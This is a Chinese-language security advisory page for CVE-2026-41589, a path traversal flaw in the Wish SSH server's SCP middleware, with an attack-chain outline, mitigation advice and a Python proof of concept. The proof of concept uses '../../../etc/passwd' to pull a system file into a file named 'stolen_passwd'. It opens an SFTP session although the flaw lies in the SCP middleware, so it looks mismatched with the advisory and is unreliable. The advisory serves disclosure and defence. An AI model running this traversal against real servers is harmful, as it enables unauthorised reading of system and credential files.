CVE-2026-41589 CVSS 9.6 严重

CVE-2026-41589 Wish SCP中间件路径遍历漏洞

披露日期: 2026-05-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41589

漏洞类型

路径遍历

CVSS评分

9.6 严重

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Wish

漏洞概述

Wish是一个带有默认配置和中间件集合的SSH服务器。在2.0.0至2.0.1之前的版本中，charm.land/wish/v2的SCP中间件存在路径遍历漏洞。恶意SCP客户端通过发送包含 '../' 序列的特殊文件名，可绕过配置的根目录限制，读取服务器任意文件、写入任意文件或创建目录。该问题已在2.0.1版本中修复。

技术细节

该漏洞的根源在于Wish的SCP中间件在处理客户端传输请求时，缺乏对文件路径的安全验证与规范化处理。SCP协议在传输文件时依赖客户端发送文件路径信息，受影响的版本（2.0.0至2.0.1之前）未能过滤路径遍历字符序列（如 '../'）。当攻击者作为一个拥有低权限的认证用户连接到SSH服务器时，可以通过SCP客户端发送精心构造的恶意请求，在目标路径中插入 '../'。这使得攻击者能够突破预配置的根目录限制，访问服务器文件系统中的任意位置。利用此漏洞，攻击者可以读取敏感配置信息、SSH密钥，写入Webshell或后门程序，甚至创建任意目录，严重威胁服务器的机密性与完整性。

攻击链分析

STEP 1

侦察

识别目标服务器是否运行了受影响版本的Wish (2.0.0 <= version < 2.0.1)。

STEP 2

初始访问

攻击者获取一个低权限的SSH账号凭证，并连接到目标服务器。

STEP 3

漏洞利用

攻击者使用SCP客户端发送请求，在文件名中插入 '../' 序列（如 '../../../etc/passwd'），尝试绕过根目录限制。

STEP 4

影响达成

成功读取服务器上的敏感文件，或向系统任意位置写入恶意文件，导致数据泄露或系统被控。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import paramiko
import sys

# Conceptual PoC for Path Traversal in Wish SCP Middleware
# Target: CVE-2026-41589
# Description: Connects to the target SSH server and attempts to read a file outside the root directory.

TARGET_HOST = "target_ip"
TARGET_PORT = 22
USERNAME = "low_priv_user"
PASSWORD = "password"

try:
    # Create SSH client
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect(TARGET_HOST, TARGET_PORT, USERNAME, PASSWORD)

    # Open SCP client
    scp = client.open_sftp()

    # Attempt to read /etc/passwd using path traversal
    # The vulnerable SCP middleware does not sanitize '../'
    remote_file_path = "../../../etc/passwd"
    local_file_path = "./stolen_passwd"

    print(f"[+] Attempting to download {remote_file_path}...")
    scp.get(remote_file_path, local_file_path)

    print("[+] File downloaded successfully.")
    scp.close()
    client.close()

except Exception as e:
    print(f"[-] Error: {e}")

影响范围

Wish >= 2.0.0, < 2.0.1

防御指南

临时缓解措施

如果无法立即升级，建议临时禁用Wish中的SCP中间件功能，并严格限制SSH服务的访问来源IP，仅允许可信网络连接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表